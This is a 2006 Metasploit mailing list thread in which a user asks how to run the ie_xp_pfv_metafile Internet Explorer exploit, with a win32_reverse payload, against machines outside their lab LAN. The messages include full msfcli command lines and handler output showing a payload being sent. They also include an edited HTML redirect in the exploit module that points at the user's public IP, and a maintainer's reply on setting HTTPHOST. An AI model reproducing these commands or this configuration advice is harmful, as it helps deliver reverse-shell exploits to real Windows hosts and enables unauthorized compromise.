Metasploit mailing list archives

Framework through lan


From: 2xyofr at gmail.com (2xyo)
Date: Sun, 29 Jan 2006 12:21:28 +0100

H D Moore wrote:

To use a different address for the redirect, just set the HTTPHOST 
variable to your external IP address. That error message about the patch 
not matching the module name can be fixed by either changing the 
"package" line at the top of the file to match the file, or just removing 
it if you no longer need it.

-HD
 

Thanks for your reply. But i haved already try command with HTTPHOST and 
i have this error (with original ie_xp_pfv_metafile) :
twoxyo at debian:~/framework-2.5$ ./msfcli ie_xp_pfv_metafile  
LHOST=192.168.1.106 HTTPPORT=8080 HTTPHOST=84.155.283.197 
PAYLOAD=win32_reverse E
[*] Starting Reverse Handler.
[-] Failed to create local HTTP listener on 8080
[*] Exiting Reverse Hand


YoYo

On Saturday 28 January 2006 15:57, 2xyo wrote:
 

Hello,

I test win32_reverse with ie_xp_pfv_metafile exploit in my virtual lan
with VMWARE and it's run.
But, i couldn't use this exploit without my lan. I don't know how set
variable for run this.

I haved modify /exploits/ie_xp_pfv_metafile.pm because it redirect to
my lan adresse et not public adresse
"<html><header><meta http-equiv='refresh' content='0;
URL=http://mypublicip${wmfpath}.${ext}&apos;></header><body>".
I haved also forward theses ports in my router.

twoxyo at debian:~/framework-2.5$ ./msfcli ie_xp_pfv_metafile
LHOST=mypublicip HTTPPORT=8080 LPORT=3300  PAYLOAD=win32_reverse E
[*] The module Msf::Exploit::ie_xp_pfv_metafile does not match the path
/home/twoxyo/framework-2.5/exploits/original_ie_xp_pfv.metafile.pm
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.106:8080/
[*] HTTP Client connected from 192.168.1.1:1279, redirecting...
[*] HTTP Client connected from 192.168.1.1:1276, sending 1344 bytes of
payload...
   




Current thread: